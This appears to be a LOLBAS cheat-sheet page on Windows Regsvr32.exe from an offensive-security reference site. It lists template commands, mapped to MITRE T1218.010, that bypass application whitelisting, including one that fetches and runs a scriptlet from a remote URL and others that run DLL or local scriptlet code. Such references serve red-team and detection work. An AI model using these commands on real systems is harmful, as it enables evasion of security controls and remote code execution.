🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
πŸͺŸ LOLBAS / Regsvr32.exe

Regsvr32.exe

Used by Windows to register dlls

AWL Bypass

Execute code from remote scriptlet, bypass Application whitelisting

regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll

Execute the specified remote .SCT script with scrobj.dll. — MITRE: T1218.010 — Privileges: User

Execute code from scriptlet, bypass Application whitelisting

regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll

Execute the specified local .SCT script with scrobj.dll. — MITRE: T1218.010 — Privileges: User

Execute

Execute code from remote scriptlet, bypass Application whitelisting

regsvr32 /s /n /u /i:{REMOTEURL:.sct} scrobj.dll

Execute the specified remote .SCT script with scrobj.dll. — MITRE: T1218.010 — Privileges: User

Execute code from scriptlet, bypass Application whitelisting

regsvr32.exe /s /u /i:{PATH:.sct} scrobj.dll

Execute the specified local .SCT script with scrobj.dll. — MITRE: T1218.010 — Privileges: User

Execute DLL file

regsvr32.exe /s {PATH:.dll}

Execute code in a DLL. The code must be inside the exported function `DllRegisterServer`. — MITRE: T1218.010 — Privileges: User

Execute DLL file

regsvr32.exe /u /s {PATH:.dll}

Execute code in a DLL. The code must be inside the exported function `DllUnRegisterServer`. — MITRE: T1218.010 — Privileges: User